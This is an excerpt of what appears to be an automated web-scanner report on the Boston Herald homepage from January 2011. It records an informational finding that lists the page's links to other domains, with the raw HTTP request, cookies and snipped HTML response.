<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01272011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01262011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01252011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01242011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01232011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01202011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01212011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01192011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan182011_A064.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01172011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20110116.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01152011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan142011_A076.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01132011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01122011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01112011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01102011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01092011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports01082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01072011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01062011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01052011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01042011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_02032011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01022011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01012011.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20101218.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec142010_A060.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/swports12132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports12092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec072010_A068.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12052010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/Sports_01282011.jpg">

<br />
...[SNIP]...

17.271. http://www.bostonherald.com/homepage.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/homepage.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/homepage.bg?showResults=1#results

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg
http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg
http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/02.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/07.gif
http://cache.heraldinteractive.com/images/siteImages/weather/19.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg
http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg
http://multimedia.heraldinteractive.com/images/20110126/d0a387_Padma_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/8a420e_ltpSteamB012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG
http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg
http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg
http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg
http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg
http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.carfind.com/?srvc=home&position=also
http://www.carfind.com/sellCar.bg
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg
http://www.homefind.com/
http://www.homefind.com/?listingid=HF5728980
http://www.homefind.com/?srvc=home&position=also
http://www.homefind.com/for-agents/
http://www.homefind.com/post-property/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.people2people.com/?connect=boshrld&page=login
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.shoplocal.com/bostonherald/
http://www.uclick.com/client/boh/sudoc/

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
